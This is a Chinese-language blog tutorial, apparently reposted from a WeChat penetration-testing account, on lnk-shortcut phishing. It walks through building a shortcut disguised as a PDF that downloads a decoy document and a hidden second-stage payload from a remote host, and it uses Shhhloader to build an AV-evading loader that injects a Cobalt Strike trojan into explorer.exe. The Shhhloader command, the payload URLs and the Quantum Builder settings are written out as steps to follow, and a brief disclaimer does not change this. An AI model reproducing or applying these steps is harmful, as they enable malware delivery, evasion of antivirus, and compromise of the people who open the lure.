【鱼饵】使用link快捷方式钓鱼

首先我们来看这样一个信息：

利用Shhhloader框架对俄罗斯汽车交易平台进行攻击，或与乌克兰IT网军有关

猎影实验室，公众号：网络安全研究宅基地利用Shhhloader框架对俄罗斯汽车交易平台进行攻击，或与乌克兰IT网军有关

其中这涉及到多个技术，包括知名的link快捷方式攻击技术，dll劫持技术，以及shellcode加载器。

由于dll劫持技术这部分还有点问题，暂时无法完全复现该场景，我们先来看下另外两部分。文中介绍到：

“其中Алкоголь_2023.pdf.lnk为恶意lnk文件，运行时首先运行update.exe,然后使用浏览器打开alcohol.pdf,文档打开后显示为俄罗斯美食连锁店Globus Gourmet的酒水单。”

这是如何做到的？下面我们来演示看下：

我们需要准备2个工具：

Shhhloader： 新型shellcode加载器，截至24年1月作者已支持10种加载方式。

Quantum Builder ：量子构建器，知名暗网黑客工具，用于link快捷方式攻击。

一、首先我们使用Shhhloader快速生成PE

┌──(root㉿kali)-[/home/kali/Desktop/Shhhloader]└─# python Shhhloader.py -m PoolPartyModuleStomping payload_x64.bin -o demo.exe┳┻|┻┳|┳┻|┻┳|┳┻| _┻┳| •.•)  - Shhhhh, AV might hear us! ┳┻|⊂ﾉ   ┻┳|[+] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER[+] Targeting existing explorer.exe process for PoolPartyModuleStomping injection[+] Using GetSyscallStub for syscalls[+] PPID Spoofing has been disabled[+] Using sleep technique for sandbox evasion[+] Randomizing syscall names[+] Saved new stub to stub.cpp[+] Compiling new stub...[!] demo.exe has been compiled successfully!

二、然后打开黑客工具量子构建器

http://192.168.136.143/demo.exehttp://192.168.136.143/hello.pdfhello.pdfhelloAppData Temp

选择第二阶段载荷，依次配置如下：

payload远程url:  填写负载远程 url，上面生成的PE

勾选decop：诱饵文件，选择一个PDF文件

勾选hide：用于将下载至本地的PE隐藏

将payload选择下载放置AppData目录，诱饵文件选择下载至temp目录

立即执行

使用诱饵文件替换link文件进一步隐藏攻击痕迹

三、将诱饵文件hello.pdf、payload、以及二阶段文件hello上传至远程服务器

四、生成link快捷方式

图标选择PDFhttp://192.168.136.143/hellohello.pdf100this is a demo

五、最后我们一起来看下：

双击恶意快捷方式后下载并打开诱饵文件hello.pdf，同时替换了原Link文件，与此同时加载恶意PE，PE利用PoolPartyModuleStomping注入技术加载了cobaltstrike木马。

比较下诱饵文件与link快捷方式图标，基本一致。

免责声明：本文所涉及的信息安全技术知识仅供参考和学习之用，并不构成任何明示或暗示的保证。读者在使用本文提供的信息时，应自行判断其适用性，并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下，本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规，并保证不违反任何相关法律法规。

原文始发于微信公众号（kali linux渗透测试）：【鱼饵】使用link快捷方式钓鱼